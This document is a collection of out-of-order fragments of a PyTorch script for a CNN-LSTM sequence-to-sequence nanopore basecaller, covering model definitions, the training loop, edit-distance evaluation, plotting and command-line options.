"train_ds[5] #Get training data train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True)",
"if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: # (256, 1, 11)",
"pdf: plot_error_accuarcy(out12[1], pdf, editD=editD) bestPerformance2File(out12[1], save_files_path + \"best_performances_{}.txt\".format(fname), editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0],",
"acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser =",
"f.close() # with 10 reads, kernel size = 11 start = time.time() out12",
"= self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim)",
"sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:,",
"clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not None: input_x_val",
"= matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and \"bias\" in p",
"bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout)",
"= batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional =",
"len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend()",
"batch size, output dim] top1 = input_decoder.argmax(1) # get argmax of prediction #if",
"clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25,",
"true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target",
"sorted_len_target # In[ ]: def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset",
"idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1:",
"matrix_param[p].shape[1] == 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m",
"train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port),",
"chosen between 1 and a few hundreds, e.g. [batch size] = 32 is",
"= LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional = bidir, port=port,",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\"",
"{} dict_validation_acc2 = {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {}",
"3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy",
"f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\"",
"bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h",
"Define the output layer if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim",
"in p.keys(): if epoch % print_epoch == 0 or epoch == max(p.keys()): x",
"name in y_len: if \"bias\" in name and \"lstm\" in name and \"linear\"",
"loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile",
"4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]])",
"else: # ed = 0 # ed2 = old_ed # # old_ed =",
"last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches that",
"% print_epoch == 0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) #",
"shape (num_layers, batch_size, hidden_dim). # Sort instances by sequence length in descending order",
"in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels =",
"sys import torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional",
"help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") #",
"epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2),",
"1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from",
"if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50,",
"INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR",
"bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional: if self.attention: # attention",
"= F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy =",
"name: print(name,param.data.size()) n = param.size(0) # forget gate start, end = n//4, n//2",
"attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first:",
"{} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd = {}",
"call = args.call lr = args.learning_rate editD = args.editD sgd = False out_classes",
"np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax",
"# * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder # The Encoder #",
"x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate,",
"{} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {}",
"output gate start, end = n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start:",
"hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :]",
"\"Encoder and decoder must have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size,",
"lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder must be equal!\" assert lstm_encoder.num_layers ==",
"plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val = input[1], input[3], input[5]",
"max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f",
"sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length",
"editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val",
"= val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 =",
"0.95 else: teacher_forcing_ratio # Evaluation on the validation set val_losses = [] val_acc",
"[] model.eval() total_ed = 0 total_num_chars = 0 with torch.no_grad(): for iteration_val, data_val",
"CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES",
"(num_layers, batch_size, hidden_dim). # Sort instances by sequence length in descending order #print(\"in",
"by decreasing target length sorted_len_target, sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target,",
"CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout",
"0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates)",
"this list of conditions and the following disclaimer in the documentation and/or other",
"output layer if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4,",
"patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01 clipping_value = args.gradient_clip # LSTM",
"= script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set",
"be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal number",
"start, end = n//2 + n//4, n input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2)",
"dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2",
"nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) #",
"split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases,",
"len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from validation set\")",
"= 0 loss_iteration = [] acc_iteration = [] editd_iteration = [] for iteration,",
"= torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim] max_in_batch",
":, :] # batch, out_size, seq_len ########################################### ##### Decoder ############################# ########################################### #### LSTM",
"pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False):",
"= self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width)",
"epoch_editd_val = 0 epoch_editd = 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\"",
"seq length (i) >= true seq length if i >= true_y_len[-1].item() and len(true_y_len)",
"hidden): h, c = hidden h = h.view(x.size(0), -1) c = c.view(x.size(0), -1)",
"math import torch.optim as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import",
"parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network # ----------- #",
"self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode input input_decoder = label",
"def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in name and len(list(param.data.size()))",
"= False, bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim",
"None) and (updates % make_validation == 0): # or (updates == n_epochs-1)): if",
"writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates)",
"dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates)",
"self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention",
"#if editD: # if updates % make_validation == 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2),",
"sig_len, label_len, label10, read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0,",
"distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val], max_idx_val)) else: f.write(\"best performances",
"= nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort the output _,",
"sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val,",
"binary form must reproduce the above copyright notice, this list of conditions and",
"# Evaluation on the validation set val_losses = [] val_acc = [] val_editd",
"DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF",
"parser.parse_args(argv[1:]) infile = args.input fname = args.output port = args.gpu_port SEED = args.set_seed",
"= args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers",
"unsort the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx =",
"lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size,",
"our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self,",
"for iteration_val, data_val in enumerate(val_loader): batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val =",
":] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label",
"0, 1).contiguous() # input for LSTM seq_length x out_size # Calculate cross entropy",
"> 0.35 and teacher_forcing_ratio >= 0.25: # if we have reached half of",
"for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head()) sns.set(font_scale=0.4) svm =",
"encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by",
"= args.learning_rate editD = args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED)",
"labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ###########################################",
"encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output",
"# with 10 reads, kernel size = 11 start = time.time() out12 =",
"model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer =",
"if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1)",
"total_num_chars += num_char_ref if editD: cer = float(total_ed) / total_num_chars if updates ==",
"in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0,",
"sequences true_y_len = true_y_len[not_padded_batches] # remove smallest element = last one #print(true_y_len, true_y_len.size())",
"ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF",
"m.named_parameters(): if \"weight\" in name and len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None,",
"batch_first=True, bidirectional=False, dropout=self.dropout) # Define the output layer if self.bidirectional: if self.attention: #",
"# ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed # else: #",
"parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides",
"= self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by decreasing target",
"2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim",
"print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(),",
"# seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]:",
"# Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index",
"layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout)",
"if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim",
"print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1))",
"get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len,",
"ed2 = ed # else: # ed = 0 # ed2 = old_ed",
"data[1] seq_len = data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them in",
"bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\",",
"= y[not_padded_batches, :, i] # batch-i, features, seq len y = y[not_padded_batches, :,",
"running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train =",
"split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len)))",
"= args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout =",
"self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout = dropout",
"of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim] #",
"# running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration +",
"set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit",
"= open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal",
"val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer,",
"hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias",
"LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF",
"labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting",
"length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder =",
"activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2, 2, i) for epoch",
"const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l',",
"G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir +",
"set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000,",
"and len(true_y_len) > 1: not_padded_batches = i < true_y_len # get indices of",
"np.linalg.norm(m[start: end], ord=2) # cell gate start, end = n//2, n//2 + n//4",
"dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder",
"initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def",
"token as next input #if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port)",
"= ecoder_output[sorted_idx_target, :, :] # sort labels so that they match with order",
"{} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {}",
"running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates = 0 heatmap_g",
"in binary form must reproduce the above copyright notice, this list of conditions",
"self.port = port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in",
"signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val,",
"== 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed #",
"#writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] =",
"train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train:",
"default=False) return parser # Network # ----------- # * CNN-Encoder # * LSTM-Encoder",
"own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim =",
"the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo",
"acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:])",
"= input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim =",
"lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert",
"[\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i += 1 ax =",
"= 0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) >",
"forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end = n//2,",
"1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" * 100)",
"dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels,",
"= (seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val",
"= fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation",
"pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0],",
"for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases",
"layer if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1)",
"= input_decoder # [max. target length, batch size, output dim] top1 = input_decoder.argmax(1)",
"def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len,",
"nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort the output _, original_idx",
"3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit",
"bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder",
"in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda",
"in name: if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n =",
"descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1",
"def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\", 2:",
"max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation",
"n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is",
"in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\"",
"hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100)",
"dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call lr = args.learning_rate editD",
"source code must retain the above copyright notice, this list of conditions and",
"p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x",
"# this locator puts ticks at regular intervals if epoch == 0: ax.plot(np.arange(0,",
"self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll",
"type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates",
":, :] else: label = y[:, :, i] # batch, features, seq len",
"ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE",
"forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001,",
"args.learning_rate editD = args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED)",
"= lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output",
"not teacher_force = random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features",
"SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on,",
"ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy as",
"wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\")",
"n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start, end",
"lstm_decoder.num_layers, \"Encoder and decoder must have equal number of layers!\" assert lstm_encoder.batch_size ==",
"edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\")",
"float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val",
"batch_first=True) def init_hidden(self): # This is what we'll initialise our hidden state as",
"= {} dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train =",
"h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings",
"length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\")",
"# get only batches that are NOT padded h = hidden[0][:, not_padded_batches, :]",
"early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc",
"running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration)",
"earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start, 3600) minutes,",
"feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll",
